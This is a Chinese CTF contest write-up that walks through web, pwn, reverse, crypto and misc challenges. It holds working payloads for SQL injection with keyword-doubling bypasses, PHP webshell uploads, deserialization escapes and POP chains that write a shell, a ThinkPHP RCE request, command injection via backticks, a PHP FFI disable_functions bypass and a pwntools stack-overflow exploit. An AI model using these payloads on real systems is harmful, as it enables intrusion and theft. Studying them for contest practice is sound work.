第二次更新,终于把Web更完了!最后一道web知识点巨多!
2021新生赛
就嗯肝,倒也还行,可惜杂项肝的太久,web没a完,其他几个题型也没什么时间研究….
Web
checkin
1 |
|
数组运算符
\$a == \$b 具有相同键值对则true
- \$a === \$b 具有相同键值对且顺序相同则true
payload1:
b[1]=T&b[0]=C&b[2]=F
数组和数字大小比较
- 参考php手册
- array和其他类型比较,array总是更大
payload2:
?num2[]
md5碰撞
一大堆判断,过滤了数组绕过和字符串0e绕过
只能用真实碰撞
工具:fastcoll 用于生成md5相同,但内容不同的两个文件
- 新建一个1.txt,随便写点东西
fastcoll_v1.0.0.5.exe -p 1.txt -o 2.txt 3.txt
生成两个新文件
然后读取文件内容做个url编码作为参数传递即可
1
2
3
4
5
6
7
8
9
10
11
function readmyfile($path){
$fh = fopen($path, "rb");
$data = fread($fh, filesize($path));
fclose($fh);
return $data;
}
echo md5( (readmyfile("2.txt")))."\n";
echo urlencode(readmyfile("2.txt"))."\n";
echo md5( (readmyfile("3.txt")))."\n";
echo urlencode(readmyfile("3.txt"));
payload:
GET:
POST:
1 | b[1]=T&b[0]=C&b[2]=F&md5a=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00J%29%88%60e%F7%87E%FE%FA%FE%E5-%FB%B7M1%AE%87xiG%3BK%116%3B%BA00%AA%C9%97%C3%E9%E4L%26%AC%26%8B%08U%D2%F1%C3%23w%2C%3C%3E%B1%92V%86L%97%C4%ADI%8D%CDY%C9%7E%CA%02%12%C1%2Fc%06K%3A%25%C9%97%E9%09D%40%27F%8E%00%BB%00a%E1%FB%F4%C4%D8+%5D%A2%C7P%1F%DF%21%1B%82%D5o%A4%AC%EF%F4%8DN%C8%1A%02%12%0E%C5%40%28%95H%D5%7EM%1C%26%88%F3&md5b=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00J%29%88%60e%F7%87E%FE%FA%FE%E5-%FB%B7M1%AE%87%F8iG%3BK%116%3B%BA00%AA%C9%97%C3%E9%E4L%26%AC%26%8B%08U%D2%F1C%24w%2C%3C%3E%B1%92V%86L%97%C4%AD%C9%8D%CDY%C9%7E%CA%02%12%C1%2Fc%06K%3A%25%C9%97%E9%09D%40%27F%0E%00%BB%00a%E1%FB%F4%C4%D8+%5D%A2%C7P%1F%DF%21%1B%82%D5o%A4%AC%EF%F4%0DN%C8%1A%02%12%0E%C5%40%28%95H%D5%7E%CD%1C%26%88%F3 |
flag: ctf{Good_Luck_Have_Fun!}
baby-sql
- username 单引报错,找到注入点
1' or 1=1#
出了个admin1' or 1=2#
出了????1' order by 3#
出了????1' order by 4#
报错,有3个字段1' union select 1,2,3#
2,3回显1' union select 1,2,database()
出库名babysql1' union select 1,2,table_name from information_schema.tables where table_schema= 'babysql'
出表名flag1' union select 1,2,group_concat(column_name) from information_schema.columns where TABLE_NAME='flag'
出字段名id、flag1' union select 1,2,flag from flag#
出flag
flag:flag{9d5ae6b83c7ad5703872574e49aaf6f0}
baby-upload
传个一句话php马就完事了
1 |
|
传后访问路径,执行个系统命令cmd=system('cat /flag');
flag:flag{fcc9fbd1d19b3de78b7346bbb005d0d5}
baby-unserialize
1 |
|
__wakeup()绕过
- 执行unserialize时会首先调用魔术方法wakeup,里面把php文件改名了,得绕
- CVE-2016-7124:当成员属性数目大于实际数目时导致反序列化异常,可绕过__wakeup()
- 影响版本:php5 < 5.6.25 php7 < 7.0.10
payload1:
str=O:4:"baby":2:{s:8:"filename";s:8:"flag.php";}
正则绕过
- 序列化字符串,将表示属性值的小写s改为大写,可以解析十六进制,以此绕过正则匹配
最终payload:str=O:4:"baby":2:{s:8:"filename";S:8:"\66lag.php";}
flag:flag{f44973d81697b67b26e2a357f537dc3b}
easy_js
- 查看网页源码,看到个index.js,打开,放入js美化/反混淆工具)里面(强推CyberChef这个工具,最好下了本地用,集成了很多功能)
1 | var H1 = 0; |
- 代码很长,关注重点函数就行了,发现一个url和参数:
flaggggggggggggggg.php?c1ick=
,直接传99999999,出flag
payload:/flaggggggggggggggg.php?c1ick=99999999
flag:flag{ac24adc5685ff-f6402e80bc-6fb6ae59-62aa51fa}
easy_sql
1" or 1=2#
报错,双引闭合- waf只是简单的过滤关键字,双写关键字绕过即可
1" oorrder by 4#
报错,3个字段1" ununionion seselectlect 1,2,3#
回显2,3不管了,直接猜数据库和babysql一样,不爆了1" ununionion seselectlect 1,2,database()
出库名easysql1" ununionion seselectlect 1,2,table_name frroom infoorrmation_schema.tables whwhereere table_schema='easysql'#
出表名flag1" ununionion seselectlect 1,2,grrooup_concat(column_name) frroom infoorrmation_schema.columns whwhereere TABLE_NAME='flflagag'#
出字段名id、flag1" ununionion seselectlect 1,2,flflagag frroom flflagag
出flag
flag:flag{d7edeb1366bd99aa12d109c99267e37e}
easy-upload
黑名单过滤,过滤方法是将字符串替换为空,可以双写绕过
一句话php马,文件名:a.pphphp
1 |
|
flag:flag{b1ab8564a34adef4aaf542bfed45652c}
easy-unserialize
1 |
|
代码审计
- post接收两个参数,传入tmp类后序列化
- 序列化字符串经过过滤,easy变为ez
- 过滤后的字符串进行反序列化
关键点:给类getflag的file赋上值flag.php,并实例化对象(为了调用__destruct())
反序列化字符串逃逸
u1s1我觉得这篇文章总结的还行,不知道为什么没有赞,mark一下,后期自己再整理一遍
- 严格来说属于字符串逃逸中的类逃逸
先给getflag类的file赋上值序列化一下:
O:7:"getflag":1:{s:4:"file";s:8:"flag.php";}
给str1赋值easy,str2赋值上面的序列化字符串,看下结果
O:3:”tmp”:2:{s:4:”str1”;s:4:”easy”;s:4:”str2”;s:44:”O:7:”getflag”:1:{s:4:”file”;s:8:”flag.php”;}”;}
O:3:”tmp”:2:{s:4:”str1”;s:4:”ez”;s:4:”str2”;s:44:”O:7:”getflag”:1:{s:4:”file”;s:8:”flag.php”;}”;}可以看到经过过滤
s:4:"easy"
变成了s:4:"ez"
,逃逸了两个字符思路:长变短逃逸没办法把已有属性逃逸出去,因此我们直接让tmp类多一个属性str3,并让str3属性的值为getflag类的序列化字符串(这就是类逃逸)
以此构造
str2=;s:4:"str3";O:7:"getflag":1:{s:4:"file";s:8:"flag.php";}
- 分号是为了闭合前面的双引,让他读到
";
时能够正确闭合属性
- 分号是为了闭合前面的双引,让他读到
序列化一下得到
O:3:"tmp":2:{s:4:"str1";s:4:"easy";s:4:"str2";s:56:";s:4:"str3";O:7:"getflag":1:{s:4:"file";s:8:"flag.php";}";}
- 从easy后面到str3的值前面,
";s:4:"str2";s:56:
是需要我们覆盖的,计算一下有18个字符 - 根据每个easy变ez能逃逸2个字符,我们构造9个easy刚好逃逸18个字符
- 从easy后面到str3的值前面,
构造后尝试一下反序列化,可以看到s:36:后面刚好把需要覆盖的内容包含进去了,造成了类逃逸,实例化了getflag类
最终payload:
post:str1=easyeasyeasyeasyeasyeasyeasyeasyeasy&str2=;s:4:"str3";O:7:"getflag":1:{s:4:"file";s:8:"flag.php";}
发送后查看网页源码得flag:flag{e99eca072a432c54b84e18e5c5c62ef5}
ezPy
根据题目意思这大概和python有关,搜了一下python的注入,基本都是ssti的模板注入,传个参数试一下:
可以看到4 = 4,意味着其中的语句被解析了,原理分析网上一堆,不细说,直接参考vulhub的exp,把popen执行的命令改为cat /flag
这里要不要url编码好像都行,不过用burp的话最好还是用下url编码,不然可能出问题
flag:flag{Pyth0n_1s_1mp0rtant!!!!!}
simple_php
- 翻了源码、前端、返回包等所有可能藏hint的地方都没hint,访问了下index.php正常,访问随便其他的比如1.php会报404,基本是源码泄露没跑了
- 常见源码泄露参考 (先自己mark一下,后期再整理一遍,,)
访问index.php.swp,拿到源码
1 |
|
代码审计
- 接收get请求code参数
- 过字符串长度过滤和正则后eval执行
思路
字符串不能太长,所以通过system(‘cat /flag’)不可取 => 直接执行getflag函数
绕正则,先fuzz一下看看出题人留了什么给我们用
1
2
3
4
5
6for($var = 33; $var < 127; $var++) {
if(!preg_match('/[a-zA-Z0-9_&^<>"\'$#@!*&+=.`\[\]{}?,]+/',chr($var))) {
echo chr($var);
}
}
// %()-/:;\|~
参考p神博客,这题属于无字母无数字shell的进阶版,异或和自增绕过都用不了,因此要用取反绕过
先对字符串getflag取反,由于取反后会有不可见字符,因此再用url编码一下:
urlencode(~'getflag')
得%98%9A%8B%99%93%9E%98
再作为code参数传递即可执行
@eval((getflag)())
最终payload:?code=(~%98%9A%8B%99%93%9E%98)();
flag:flag{a3b5c6d-563ae31f-b6672e33ed-ff63a5b8}
thinkphp
参考vulhub
直接拿payload来rce
直接cat /flag
拿不到,估计flag要么不在根目录要么改名了
接着find /|grep “flag”
也找不到,那就肯定是改名了,直接一层一层目录遍历上去,在根目录找到FL4G
payload:
GET:?s=captcha
POST:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat%20../../../../FL4G
flag:flag{ewyg_wyuf_ushg_dgds_dgfs!}
ez-rce
搜一搜无参数函数rce,其实挺多文章的,包括一些题目(搜[GXYCTF2019]禁止套娃)也有,不过里面要么没过滤要么过滤没出题人这么变态….
看了好多篇文章,这篇发的时间较早,总结的挺好,不过没考虑过滤的情况,觉得还是这篇的骚操作多一点,不局限于某一题,而是总结性质的告诉你哪些可以用
提炼一下用到的几个函数吧
time():返回当前的时间(Unix纪元,1970-01-01到现在的秒数)
crypt(arg)php手册:加盐哈希 => crypt(time())
详细介绍戳 => https://www.php.net/manual/zh/function.crypt.php (建议拉到下面看不同算法的盐值构造)
php的crypt有个很巧妙的地方,首先它在不同操作系统上的默认算法可能不一样(DES、Blowfish、MD5),这里我主要说MD5
crypt(“abc”) 的(某次)结果为\$1\$Yn5.BJ3.\$j5RYtWilZIabNWw4NP2YD.
$1$
表示使用加盐md5,$Yn5.BJ3.$
(两个美元符明明转义了还能识别为latex公式…真是不太聪明)两个美元符中间的是盐值,后面的是base64字符串,这就出现一个很有趣的地方了,base64里并没有.
这个表示 ,经过多次试验后,发现crypt()的结果(若使用md5)字符串末尾只有4种可能:0
、1
、.
、/
这个我搜了一下发现好像没什么人介绍过(当然可能是我搜商太差…..)想了一下,我猜大概是因为MD5的结果是128比特长,然后base64嘛,6比特代表一个字符,因此128 / 6 = 21 … 2,剩了两个比特,两个比特4种组合,所以就分别用
01./
四个字符来表示了(其实我感觉php源码应该得有写,先mark一下挖个坑吧,后期整理)hebrevc()php手册 :用于把希伯来文本从右至左的流转换为左至右的流
有的地方说“只有 224 至 251 之间的 ASCII 字符,以及标点符号受到影响”,其实不太严谨,自己写个脚本fuzz一下就可以发现,ascii=45的‘-’和ascii=47的‘/’不会受影响
前两个是不受影响的,最后是受影响的,然后ascii=251也不受影响
hebrevc(crypt(time()))
:将crypt()哈希字符串末尾的.
移到最前面ord():返回字符串中第一个字符的ascii值
chr():ascii值转字符
chr(ord(hebrevc(crypt(time()))))
:读出.
scandir()php手册:列出指定路径中的文件和目录
scandir('.')
:读当前目录中的文件和目录end():返回数组中最后一个元素
其他还有next()、prev()分别表示返回数组前一个元素或后一个元素,做题的时候没思考,直接用end()读了(大多数题都是这样),写wp的时候想到或许可以组合一下做目录遍历?要真有flag不放在最后一个的呢…(其实那篇总结下文有说,,只是都过不了本题的正则…)
show_source():没什么说的了,把文件显示出来
readfile、highlight_file、file_get_contents也可以读,只是被过滤了file,还有个readgzfile()比较冷门,可以绕过一些过滤
最后再贴次链接:http://www.heetian.com/info/827 u1s1总结的真不错,mark一下后期整理
最终payload:
POST:shell=show_source(end(scandir(chr(ord(hebrevc(crypt(time())))))));
如果报scandir($)的错就多提交几次,毕竟crypt()以.
结尾只有25%的概率
flag:flag{68ff971077c08515fdbbd83fac40fcb1}
ezpop
u1s1我觉得这题出的真不错…虽然pop链分析的文章很多,也有题目的wp,不过结合了一些其他的小trick感觉就很巧妙,有很多值得mark后后期整理的地方
1 |
|
代码审计
- 代码比较多,审计直接写注释里了,看起来方便些
思路
最终我们需要的东西在
file_put_contents("$dir" . "hack.php", $this->data);
里,这里可以data可控,所以想法是写一个php马进去,因此需要让程序运行到这一句并成功写入shell调用链:
1
2
3
4
5
6
7openfunc
->__wakeup()->normal#action() // 需要绕过
->__destruct()
[->object#action()] // object赋为evil类
->evil#action() ->hack#action() // 子类没有action()方法,去父类找
->hack#pass() ->evil#pass() // 父类接口由子类实现
->evil#shell()分析完调用链就需要一步一步绕过了
绕__wakeup()
没什么好说了,成员属性数目大于实际数目即可
date()
其实这个地方一开始以为可以用public和protected访问控制修饰符修改的方法绕过的,不过好像用不了,先mark一下,后期看看整理一波利用姿势
参考php手册:date的特性:当date()参数不是格式字串时将原样展示
因此
$this->c
赋值为“shell”的url编码即可(url编码中的小写c属于格式字串,改为大写就可以了)
file_put_contents():
参考php手册
第二个参数可以是数组,因此可以用来绕过上面的正则,比如
data=eval();
=>data=['ev','al();']
都绕完了就开始写exp:
1 | $open=new openfunc(); |
最终payload
GET:
1 | ?Xp0int=Tzo4OiJvcGVuZnVuYyI6Mjp7czo2OiJvYmplY3QiO086NDoiZXZpbCI6NDp7czo0OiJkYXRhIjthOjQ6e2k6MDtzOjQ6Ijw/cGgiO2k6MTtzOjI6InAgIjtpOjI7czozOiJAZXYiO2k6MztzOjE4OiJhbCgkX1BPU1RbJ2NtZCddKTsiO31zOjE6ImEiO047czoxOiJiIjtOO3M6MToiYyI7czoxNToiJTczJTY4JTY1JTZDJTZDIjt9fQ== |
返回地址,访问hack.php,成功命令执行
目录遍历出flag位置,拿下
flag:flag{Y0u_Ar3_A_POP_Ma5ter!!!!}
PictureGenerator
麻了,比赛的时候没发现有附件,尝试了好久目录穿越任意文件下载一直下不了…结果比赛结束后和同学交流才发现有附件….
更新
真麻了,真没想到这题几乎可以说就一个知识点:$()
替换为反引(麻了反引在md的行内代码打不出来
我真找了半年资料都没想到就这一个知识点…从命令构造到pillow rce到flask注入,佛了,愣是没整明白,最后做出来的时候真有被傻到
1 | # app.py |
1 | # gene.py |
u1s1附件的代码8成都是没用的…提炼一下关键部分
1 | # app.py |
先说答案:
app.py里的命令执行,data是我们可控的,因此使用命令行内联执行(
$()
、``
(反引)),可以单独执行其中的语句,这里由于$
被过滤,因此用反引即可payload:
cat /flag > static/images/1.txt
(两边要套上反引,md里的行内代码打不出来…)作用:读取flag并重定向到static/images目录下的1.txt(因为本题没有回显,所以要重定向到文件,如果有vps的话直接发送的自己的vps,然后在自己vps上监听应该也是可以的)
直接访问
static/images/1.txt
,发现flag已经被带了出来
flag:flag{fhfgufghui_ewftftdf_whfdweyidg_gafdhjasdh_eghfhef_rhgfjrikfu!!!!}
所以本题gene.py那么多代码其实是唬人的…甚至连if "flag" in text:
那个都是没有什么用的…我还在想怎么利用那些参数,怎么绕flag的时候,发现其实只要知道他在app.py里有个命令执行,在gene.py里会保存文件且知道路径就完事了,很离谱
Imgbed
复现这题的时候环境已经关了…和出题人要了个docker自己跑
一开始给了个注册登录忘记密码
查了一圈没什么可以利用的,直接注册登录进去看看
发现个奇怪的地方,他的简洁模式url是/index.php?action=class.php
,画廊模式是/gallery.php
,同时简洁模式下有个上传的地方,先怀疑一下文件上传
把action的参数改为/flag
可以看到include()
函数已经出来了,说明存在文件包含漏洞
发现可以读/etc/passwd
却读不了/flag
,那就应该是被某种策略拦截了
参考2:从CTF学习文件包含
参考3:CTF-Web:php伪协议
payload1:/index.php?action=php://filter/read=convert.base64-encode/resource=index.php
php://filter/
是一种访问本地文件的协议/read=convert.base64-encode/
表示读取方式是base64编码(若不编码,则会直接执行index.php)参考1:当它与包含函数(常为include())结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而实现任意文件读取。
读出base64流后解密
我又得强推一波这个工具了:CyberChef,本地使用真的很方便,解密后index.php代码如下(简化了一些没用的)
1 |
|
index.php好像没什么用,继续把其他几个功能的源码读出来
class.php如下(同样简化掉没用的)
1 |
|
在这里面发现了几个关键函数:file_exists
、is_dir
、unlink
、file_get_contents
,均是可以触发phar反序列化的函数
这里其实可以利用
delete_file()
里的unlink()
函数,这个函数可以触发phar反序列化,参考题目,不过参考题目里题目将File类的get_file_contents()
名字设置为close()
,使得可以通过别的类构造调用链,这道题看起来是没办法的
上传图片时抓包,可以发现通过upload.php上传,把upload.php也拿下来看一眼
1 |
|
比较明显的二次渲染了
二次渲染参考:https://xz.aliyun.com/t/2657
代码很大一坨,简化一下(挑出我们想利用的部分)
1 |
|
选Gif是因为Gif格式的二次渲染比较容易绕,首先先制作一个gif(随便找张图片->画图打开->另存为gif即可),然后在文件末尾写个<?php phpinfo();?>
,上传,上传后下载回来比较文本,(文本比较工具:BeyondCompare,也是功能强大的工具,可以比较多种类型文件(纯文本、十六进制等)强推!)发现末尾的一句话没了,但是其他部分都没有变化
随便找个地方写进<?php phpinfo();?>
,上传,通过文件包含可以看到成功解析写入的php代码
接着写入一句话并上传,执行系统命令cmd=system('ls');
,没有反应,查看了一下phpinfo的配置,可以发现禁用了大量函数
其中就包含了system,不过没有禁用print_r
和scandir
,我们可以先目录遍历一下:cmd=print_r(scandir('/'));
发现根目录有两个可疑文件,flag和readflag,问题在于怎么读出flag,在搜常用的disable function bypass(参考1、参考2、参考3)时发现了,当php>7.4且FFI开着时,有个FFI Bypass,这时发现了我们题目的php环境正是7.4且他的FFI是开着的(话说原来FFI全称是Foreign Function Interface,还真是题目的hint…)
FFI其实就是一个外部函数接口,让我们可以在php里面调用C代码(先mark下,后期整理)
- 参考1:从RCTF nextphp看PHP7.4的FFI绕过disable_functions
- 参考2:FFI扩展 (这个可能更切合本题)
FFI EXP
1 |
|
作用:其实也是一句话木马,cmd参数,传给C语言执行系统命令,并将执行结果重定向到/tmp/123,这有两个原因:一是c语言的system函数执行后无回显,所以需要将执行结果外带;二是需要一个我们有权限读到结果的文件,所以这里选了/tmp目录
效果:post参数传cmd=ls ../../../
查看根目录,命令执行成功
尝试直接cat /flag
失败,于是尝试执行readflag,成功读出
其实这里有点马后炮了,出题人的意思是要先查看权限(whoami发现我们是www-data权限),得知flag读不了,再去执行readflag
美化一下
flag:flag{389f6784d8d9e35944001b6c2dd848cc}
Web后记:比赛时最后两题没做出来一开始还有点遗憾,不过后面发现确实给时间也不一定能做出来,还是有些知识点没接触过的,然后不知道有没有人发现我全程没用蚁剑!!毕竟校网有时会拦截蚁剑流量,所以想尽量通过post直接执行shell(毕竟蚁剑本质上也是通过这种方式做事的)
Reverse
signin
拖入ida看main的伪c(将Buf2简化一下)
1 | int __cdecl main(int argc, const char **argv, const char **envp) |
逻辑:输入的Str,经过两轮for循环计算,若与buf相等,则right,输入的Str即为flag
逆向python脚本:
1 | # -*-coding:utf-8-*- |
flag:flag{welcome_to_Re_world!}
Pwn
div_overflow
- 参考:2021强网no_output
checksec看下保护
栈上代码不可执行,其他无保护
ida看一下
main
输入v5,v4,执行v5=v5/v4后打印字符串退出
init
一个时钟,一个信号singnal,表示捕捉到8信号的时候中断并执行backdoor函数
backdoor
buf数组长度为80(0x50),但read会读0x100
getshell
弹个shell
思路:
- 触发8信号(除0或是除法发生溢出)产生中断执行backdoor
- int类型表示范围:-2^31^(-2147483648)~2^31^-1(2147483647)
- 溢出构造:-2147483648/-1 = 2147483648 大于int最大值,上溢
- backdoor给了个栈溢出,可以利用他将返回地址覆盖为getshell函数的地址
调试
断点打到backdoor,除法溢出触发中断
进入backdoor后,buf为-0x50,也就是buf会从rbp-0x50的位置开始读
构造一个‘a’*57的字符串(不是58是因为没用pwntool的话回车会算一个字符
别骂了别骂了我还是对pwntool交互不熟…),发送后发现RBP已经被修改为aaaaaaa\n,接着就是leave和ret
将上一步的payload修改为‘a’*58+0x4007c7(getshell的地址)(当然这里next的话会出错,因为多了个换行符),可以看到rsp的值被覆盖
本地程序测试一下
1
2
3
4
5
6
7from pwn import *
p =process('./div_overflow')
payload = b'a'*(0x50+8)+p64(0x4007c7)
p.sendlineafter('Please input the first key :','-2147483648')
p.sendlineafter('And the second key :','-1')
p.sendlineafter("Hero, please leave your name :",payload)
p.interactive()getshell成功
远程打
1
2
3
4
5
6
7from pwn import *
p = remote("35.229.138.83",14056)
payload = b'a'*(0x58)+p64(0x4007cb)
p.sendlineafter('Please input the first key :','-2147483648')
p.sendlineafter('And the second key :','-1')
p.sendlineafter("Hero, please leave your name :",payload)
p.interactive()这好奇怪,本地用0x4007c7是打得通的,但是远程打不通,要用0x4007c8或者0x4007cb才能通…mark一下后期再找原因
flag:flag{DIvSiOn_So_EAsy_YeS_vwtub468}
Crypto
proof_of_work
爆破sha-256前4位
1 | import hashlib |
flag:flag{f8f0e603-8a2f-4870-b81d-972ab039cfe9}
RSAStudy
- m1:给了c、d、n ==> $m = c^{d} mod n$
- m2:n太小,直接在线分解出p、q
- m3:n特别大,e特别小,因为 $c = m^{e} mod n$ ,m^e^ 若没n大可以直接对c开e次方得到m
- m4:e是20位的素数,直接遍历所有20位的素数,尝试解密,若解密后有不可见字符则跳过
1 | # -*-coding:utf-8-*- |
flag:flag{if you miss the train I'm on, You will know that I am gone}
MISC
签到
flag: flag{welcome_to_xp0int_ctf_2021!!!}
guesssssssme
1 | You konw: |
一开始以为是什么奇怪的编码,拿第一个百度了一下,震惊,居然和某个b站视频bv号一样
思路:这些bv号对应的视频的首字母连起来即为flag
其实也没几个视频,,b站一个个搜就完事了,,不知道谁那么无聊还写了个脚本去爬
- bv转av:https://www.zhihu.com/question/381784377/answer/1099438784
- 爬取网页后正则匹配标题的标签
不过后来发现好像直接用bv也行?
1 | # -*-coding:utf-8-*- |
结果:
flag:flag{menggushangdan}
fgo
尝试了获取每张小图片的时间戳,结果精度不够,排不了序
不知道怎么做了,好在我有一个破解版ps,有一个性能还算可以的电脑,还有一个快要废了的肝
拼了我3个小时吧,拼的头都裂了,蹲一个官方wp再更新
flag:flag{Fa73-Grand-Ord3r!!}
77777
题目提示led,搜了好久终于搜到相关信息:七段式led显示器/数码管
a~g分别代表一根灯管,不同的组合代表不同的数字,先写个脚本把附件里出现的组合dump出来,写入字典(这里有个坑,文件并不完全是txt,文件头有0xff,0xfe 不知道是什么,反正用winhex去掉就完事了)
1 | def LedCode(): |
接着按照字典,遍历文件,把七段式转换为数字,按每行512个写入文件
1 | def writeLed(): |
其实到这里已经勉强能看出flag了,不过有的人还是太无聊,写了个脚本把他对比度调高(每个七段式对应一个rgb)
1 | color = {'afgbcd':(100,0,0),'fgcda':(100,100,0),'abcdefg':(100,100,100), |
执行效果:
flag:flag{as5d6-68t2z6-apb33-arg}
Eeay_C51
论找软件、画电路图、了解单片机运行原理、找bug整了整整一天,还在奇怪为什么那么多人把这题秒了的时候,发现1.hex文件可以直接反汇编是什么心情…..
先用在线仿真画图(u1s1体验不错,国产之光)
但是画完了不懂怎么仿真,找不到地方导入hex文件,搜了一下好像是用来仿真电路,但没办法编译程序?
后来又找了multisim直接画仿真
然后在板子上导入1.hex文件跑起来,很遗憾,可能是我接线问题(别骂了别骂了)没跑出效果
最后继续搜资料,发现1.hex文件是由写在板子上的c程序编译生成的,我们知道pwn和re用ida反编译的二进制文件也是c编译生成的,,所以就把1.hex丢进ida了
好家伙,直接白学一天单片机白画一天图
flag:flag{Hi_t0_C51}
FFIVE
win10刷新快捷键:f5,搜索了一下 基本确定是f5隐写
实锤:图片头部有早期f5隐写插入的文本
F5隐写解密工具:https://github.com/matthewgao/F5-steganography
解密:java Extract Xp0int1.jpg
(这不得不说我一直以为-p passwd
是必须要的参数,试了Xp0int1、123456,还在winhex里仔细的翻有没有把密码写在里面,结果发现其实是可以没有密码的)
解密出output.txt,打开乱码
文件头PK => zip包格式 => 改后缀 => 解压 =>
搜一下,是Brainfuck编码(注:Brainfuck翻译为脑残),找个在线Brainfuck解码
flag:flag{ad45f2-a52f3-ae956ff-ac4b2e}
套娃
套了5000个zip,直接脚本跑
1 | import zipfile |
答案在flag0里面
flag:flag{extract_extract_extract_and_4lmost_there~}
zero_width
打开flag.txt看起来什么都没有,实际上右键看属性或者丢进010或者winhex都能看到有很多东西,下图是vim查看的效果
python脚本解密(试了一些在线解密,都不太正常,这和很多因素有关,建议有本地解密脚本最好用本地解密)
本地脚本github:https://github.com/enodari/zwsp-steg-py
截图好像好一点…因为复制代码的话md里零宽字符会变成一点
flag:flag{98055234-e9e1-4c76-b1b0-fedb03d523ce}
boom shakalaka
给的文件提示很明显了,DES加密,CBC工作模式,PAD_PKCS5填充方式,密钥,初始向量都给了,暴破 ? 处的密文即可
1 | 92F7B9?2101134780DC5A6584025EBDAA3A182407EB3?11275D3D592808998A5CA556C88DD6228AC53C389?A4B69040A0C7045E8B9F064C89A0F1795232F4AFA17C79F5A784?6A02 |
python暴破脚本(Crypto库好像找不到填充方式的选项?pyDes库就没问题)
1 | from pyDes import des,PAD_PKCS5,CBC,ECB |
匹配出来找到正常的那个就行了
flag:flag{We_know_that_brute_f0rce_1s_4_go0d_method_to_hack_the_wor1d!!!}
EZQIM
- 量化索引调制水印
1 | clear |
matlab没环境也看不懂,,,好在代码不多,找找资料还是能看出在写什么的,用python重写了一遍(应该没错吧)
matlab和python还是有点区别的,比如数组下标、cv2读取的通道顺序、numpy reshape的存取顺序都有差,这点费了我好大劲(挺离谱的,学计算机这么久没用过matlab….)
1 | import numpy as np |
核心代码很简单,读取flag和lena两张图(不是rgb,均为8位灰度值),flag每个像素点的灰度值>=200则置1,小于200置0,用m[i] = uint8((p[i] + delta * s[i]) / (b * delta)) * b * delta + s[i] * delta
改变lena的部分像素点(就是嵌入水印信息的意思),其中p为lena,s为flag根据灰度值映射后的结果,得到最终的水印图
介绍下QIM(Quantization Index Modulation,量化索引调制)
QIM算法的主要思想是:根据水印信息, 把原始载体数据用量化器量化到不同的索引区间, 水印检测时则根据调制后的数据所属的量化索引区间来识别水印信息。
太过学术的文章我觉得反而比较难懂…我找了两个博客感觉勉强容易理解一些(博客1、博客2)
用本题的例子来理解就是(做出来后和出题人聊了下,好像我的理解好像还是有偏差?算了反正整出来了):
- 每个像素点的灰度值范围是0~255(uint8),其中区间长度(步长)为delta=16,假设0~15为A区间,那么16~31为B区间,32~47为A区间,48~63为B区间….以此类推,将0~255分为A、B交错的两个区间
- flag的像素点灰度值大于200置为1,小于200置为0,得到数组s[512][80],当然后面会reshape为一维的s[512*80]
- 将lena进行量化:lena[512][512]reshape为一维的p[512*512];在s的长度(51280)内,若s[i]为1,则p[i]的像素值修改为$\lfloor(p[i]+16)/32\rfloor 32 + 16$ ,也即落在A区间(假设),若s[i]为0,则p[i]的像素值修改为$\lfloor(p[i])/32\rfloor * 32$,也即落在B区间(与A对应)
- 因此在我们得到一副水印图时,首先提取出嵌入水印的部分(reshape为一维数组后的前512*80个值),然后根据像素点的灰度值,若灰度值落在A区间(灰度值地板除16模2余1),则s[i]=1,若灰度值落在B区间,则s[i]=0,以此推出水印的信息,最后再给s的0和1赋上足够对比度的值(我用1=>200,0=>50),reshape一下就可以得到水印信息
matlab脚本:
1 | clear |
python脚本:
1 | # -*-coding:utf-8-*- |
效果:
matlab:
python:
u1s1python跑不出这个效果(我甚至把区间调的很大才有上图这个效果,如果是16完全看不出来),不知道为什么,懒得找原因了,我电脑没matlab,找了个在线的盲写了一天代码(还是现学的…)一天都在思考怎么用python表达出来,虽然有个smop(github)可以将matlab转python,但是转的很离谱….还不如自己改,结果晚上回宿舍用舍友电脑matlab一下子就跑出来了,麻了(另外吐槽下出题人在flag后面注释了512*80,结果我一直用512行80列的矩阵去读,死活读不出来,最好随便改了下参数变成80*512居然就成了)
flag:flag{2a3b-89e-f594}
blind
- 文件反转、图片分离、盲水印
给了一张图和一个压缩包,压缩包打不开,丢winhex里发现文件头和文件尾好像反了
504b0304是zip的文件头
gnp.tuotuo 颠倒一下发现是outout.png
文件反转,脚本直接跑
1 | with open("secret.zip",'rb') as f: |
跑出正常的压缩包解压,只有一张outout.png,先放着,看看另一张图secret.png,打开发现有一半是黑的,binwalk看一眼,里面藏了个zip,zip里面还有张1.png
分离,foremost分离后不太对劲,丢到winhex里看,发现他的文件头虽然是对的
但是zip包文件目录区没了,反而是在文件尾发现了文件目录区和正常的文件尾
不太懂什么原因,先mark一下,后期整理整理
分离文件的几个方法试完后
foremost secret.png
dd if=secret.png of=1.zip skip=248860 bs=1
binwalk secret.png -e
发现只有binwalk可以,而且还直接把1.png分离出来了,甚至跳过了zip伪加密的考点(应该是吧)
我不理解 难道属于非那么预期?
搞完后发现其实文件目录区可以不用一定在开头…在上面文件尾部的压缩文件目录区找到伪加密的标志位改掉就正常解压了…
麻了 搞我好多时间,我居然还想着把这段东西剪切到前面…
整完发现1.png和前面的outout.png长得一样,结合题目盲水印没跑了,工具:https://github.com/chishaxie/BlindWaterMark
一键提取python3 bwmforpy3.py decode 1.png outout.png flag.png --oldseed
flag:flag{easy_misc}(居然不是ea5y_misc???怀疑出题人搞完都忘了自己藏的是什么…)
secret
u1s1这道题没做出来,很烦,搞了我大半个晚上,不知道怎么找压缩包密码了,蹲一波wp再更新
给了个image.raw文件,搜了一下,应该是内存取证的题
- 工具:volatility(Kali好想2020开始就不预装这个了)
- 直接下载linux的可执行文件,然后给文件夹和可执行文件改个名:volatility,增加环境变量
export PATH=/mnt/hgfs/Kali_share/misc/volatility:$PATH
即可命令行使用
查看系统信息
volatility -f image.raw imageinfo
查看进程列表
volatility -f image.raw --profile=WinXPSP2x86 pslist
关注notepad.exe、7zFM.exe、cmd.exe三个进程
看一下cmd执行过的命令和notepad内容
